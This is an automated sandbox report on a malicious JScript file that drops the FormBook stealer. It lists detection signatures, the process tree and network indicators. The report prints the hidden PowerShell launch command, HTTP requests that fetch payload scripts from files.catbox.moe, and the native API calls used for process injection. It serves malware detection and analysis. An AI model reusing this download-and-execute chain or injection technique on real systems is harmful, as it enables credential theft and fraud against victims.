Edit tour

Windows Analysis Report
TT copy.js

Overview

General Information

Sample name:	TT copy.js
Analysis ID:	1578023
MD5:	24b70c6f9b34265023f8b4e9ceb4ae2e
SHA1:	94e435325199616348f67aa17f0209b90d4d6b18
SHA256:	6f1bdd6bc9a18a5ac6d7c28323e18f8aae4c5db0a5b54cc72df547518e7386c8
Tags:	jsuser-abuse_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

JScript performs obfuscated calls to suspicious functions

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

.NET source code contains potential unpacker

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

JavaScript source code contains functionality to generate code involving a shell, file or stream

Machine Learning detection for dropped file

Powershell drops PE file

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Script Initiated Connection

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 6632 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT copy.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 6896 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

x.exe (PID: 3448 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: DF1F48D5D5C174AA6AB5910BB41064FB)

x.exe (PID: 2596 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: DF1F48D5D5C174AA6AB5910BB41064FB)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.1951239959.00000000017F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.1951239959.00000000017F0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bc20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13e6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ec23:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16e72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Process Memory Space: powershell.exe PID: 6896	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x16391d:$b1: ::WriteAllBytes( 0x2a66bb:$b1: ::WriteAllBytes( 0x163939:$b2: ::FromBase64String( 0x2a66d7:$b2: ::FromBase64String( 0x51644:$s1: -join 0x5e8c5:$s1: -join 0x61d87:$s1: -join 0x62421:$s1: -join 0x63f1d:$s1: -join 0x6617f:$s1: -join 0x669a6:$s1: -join 0x67217:$s1: -join 0x67952:$s1: -join 0x67984:$s1: -join 0x679cc:$s1: -join 0x679eb:$s1: -join 0x6823c:$s1: -join 0x683b8:$s1: -join 0x68430:$s1: -join 0x684c3:$s1: -join 0x68729:$s1: -join

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.x.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
4.2.x.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ec23:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16e72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
4.2.x.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
4.2.x.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de23:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16072:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 108.181.20.35, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6632, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT copy.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT copy.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT copy.js", ProcessId: 6632, ProcessName: wscript.exe

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 108.181.20.35, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6632, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT copy.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT copy.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT copy.js", ProcessId: 6632, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT copy.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6632, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", ProcessId: 6896, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Windows executable base64 encoded

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T07:50:05.501534+0100	2018856	1	A Network Trojan was detected	108.181.20.35	443	192.168.2.4	49730	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T07:50:13.921848+0100	2803305	3	Unknown Traffic	192.168.2.4	49732	108.181.20.35	443	TCP

ETPRO MALWARE Likely Dropper Doc GET to .moe TLD

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T07:50:05.500940+0100	2827578	1	A Network Trojan was detected	192.168.2.4	49730	108.181.20.35	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Yara detected FormBook

Source: Yara match	File source: 4.2.x.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.1951239959.00000000017F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49731 version: TLS 1.2

Source:	Binary string: FREAKY.pdb source: x.exe, 00000003.00000002.1842412077.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1863261944.0000000005580000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: VCJSKS.pdb source: x.exe, 00000003.00000000.1775660603.0000000000AF2000.00000002.00000001.01000000.00000008.sdmp, x.exe.1.dr
Source:	Binary string: FREAKY.pdb(~>~ 0~_CorDllMainmscoree.dll source: x.exe, 00000003.00000002.1842412077.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1863261944.0000000005580000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: x.exe, 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: x.exe, x.exe, 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp

Software Vulnerabilities

JavaScript source code contains functionality to generate code involving a shell, file or stream

Source: TT copy.js	Argument value : ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true']	Go to definition
Source: TT copy.js	Argument value : ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"']	Go to definition
Source: TT copy.js	Argument value : ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"', '"Scripting.FileSystemObject"']	Go to definition

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4x nop then jmp 01450B8Bh	3_2_01450848
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4x nop then jmp 01450B8Bh	3_2_01450838
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4x nop then jmp 01450B8Bh	3_2_014507D0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2827578 - Severity 1 - ETPRO MALWARE Likely Dropper Doc GET to .moe TLD : 192.168.2.4:49730 -> 108.181.20.35:443
Source: Network traffic	Suricata IDS: 2018856 - Severity 1 - ET MALWARE Windows executable base64 encoded : 108.181.20.35:443 -> 192.168.2.4:49730

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 108.181.20.35 443

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /0hc11b.txt HTTP/1.1Host: files.catbox.moeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /t7rwbh.txt HTTP/1.1Host: files.catbox.moe

Source: Joe Sandbox View

IP Address: 108.181.20.35 108.181.20.35

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 108.181.20.35:443

Source: global traffic

HTTP traffic detected: GET /ugok5m.ps1 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: files.catbox.moeConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ugok5m.ps1 HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: files.catbox.moeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /0hc11b.txt HTTP/1.1Host: files.catbox.moeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /t7rwbh.txt HTTP/1.1Host: files.catbox.moe

Source: global traffic

DNS traffic detected: DNS query: files.catbox.moe

Source: powershell.exe, 00000001.00000002.1778463096.000001832437A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1798425679.000001833290C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1798425679.0000018332A42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1778463096.0000018324206000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1778463096.0000018323DE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1778463096.0000018322891000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1778463096.0000018323DE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000001.00000002.1778463096.0000018324206000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1778463096.0000018323DE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1778463096.0000018322891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.1798425679.0000018332A42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1798425679.0000018332A42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1798425679.0000018332A42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: wscript.exe, 00000000.00000002.1809879390.000001E28B734000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1809160897.000001E28D7F5000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002E39000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002E1E000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe
Source: wscript.exe, 00000000.00000002.1810546269.000001E28D804000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/
Source: x.exe, 00000003.00000002.1842412077.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/0hc11b.txt
Source: x.exe, 00000003.00000000.1775660603.0000000000AF2000.00000002.00000001.01000000.00000008.sdmp, x.exe.1.dr	String found in binary or memory: https://files.catbox.moe/0hc11b.txt%Operation
Source: x.exe, 00000003.00000002.1842412077.0000000002E39000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000000.1775660603.0000000000AF2000.00000002.00000001.01000000.00000008.sdmp, x.exe.1.dr	String found in binary or memory: https://files.catbox.moe/t7rwbh.txt
Source: wscript.exe, 00000000.00000002.1810209924.000001E28B7D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1808548812.000001E28D5AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1809879390.000001E28B740000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1808125947.000001E28D5C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1809052719.000001E28B73F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1808184117.000001E28B7CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1808155576.000001E28B97B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1808090724.000001E28D5C9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1809160897.000001E28D7F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1723248018.000001E28D5AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1723320024.000001E28D5AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1810546269.000001E28D804000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1808695826.000001E28B765000.00000004.00000020.00020000.00000000.sdmp, TT copy.js	String found in binary or memory: https://files.catbox.moe/ugok5m.ps1
Source: wscript.exe, 00000000.00000003.1808548812.000001E28D5AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1723248018.000001E28D5AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1723320024.000001E28D5AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/ugok5m.ps1u
Source: wscript.exe, 00000000.00000002.1809879390.000001E28B734000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1809160897.000001E28D7F5000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002E39000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002E1E000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe;
Source: powershell.exe, 00000001.00000002.1778463096.0000018324206000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1778463096.0000018323DE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: wscript.exe, 00000000.00000002.1810546269.000001E28D804000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.comF
Source: powershell.exe, 00000001.00000002.1778463096.000001832437A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1798425679.000001833290C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1798425679.0000018332A42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1778463096.0000018323DE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000001.00000002.1778463096.0000018323DE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown	HTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49731 version: TLS 1.2

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 4.2.x.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.1951239959.00000000017F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.x.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 4.2.x.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.1951239959.00000000017F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 6896, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\x.exe

Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}			Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0042BF13 NtClose,	4_2_0042BF13
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C35C0 NtCreateMutant,LdrInitializeThunk,	4_2_019C35C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2B60 NtClose,LdrInitializeThunk,	4_2_019C2B60
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_019C2DF0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_019C2C70
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C3090 NtSetValueKey,	4_2_019C3090
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C3010 NtOpenDirectoryObject,	4_2_019C3010
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C4340 NtSetContextThread,	4_2_019C4340
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C4650 NtSuspendThread,	4_2_019C4650
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C39B0 NtGetContextThread,	4_2_019C39B0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2B80 NtQueryInformationFile,	4_2_019C2B80
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2BA0 NtEnumerateValueKey,	4_2_019C2BA0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2BF0 NtAllocateVirtualMemory,	4_2_019C2BF0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2BE0 NtQueryValueKey,	4_2_019C2BE0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2AB0 NtWaitForSingleObject,	4_2_019C2AB0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2AD0 NtReadFile,	4_2_019C2AD0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2AF0 NtWriteFile,	4_2_019C2AF0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2DB0 NtEnumerateKey,	4_2_019C2DB0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2DD0 NtDelayExecution,	4_2_019C2DD0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C3D10 NtOpenProcessToken,	4_2_019C3D10
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2D10 NtMapViewOfSection,	4_2_019C2D10
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2D00 NtSetInformationFile,	4_2_019C2D00
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2D30 NtUnmapViewOfSection,	4_2_019C2D30
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C3D70 NtOpenThread,	4_2_019C3D70
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2CA0 NtQueryInformationToken,	4_2_019C2CA0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2CC0 NtQueryVirtualMemory,	4_2_019C2CC0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2CF0 NtOpenProcess,	4_2_019C2CF0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2C00 NtQueryInformationProcess,	4_2_019C2C00
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2C60 NtCreateKey,	4_2_019C2C60
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2F90 NtProtectVirtualMemory,	4_2_019C2F90
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2FB0 NtResumeThread,	4_2_019C2FB0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2FA0 NtQuerySection,	4_2_019C2FA0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2FE0 NtCreateFile,	4_2_019C2FE0
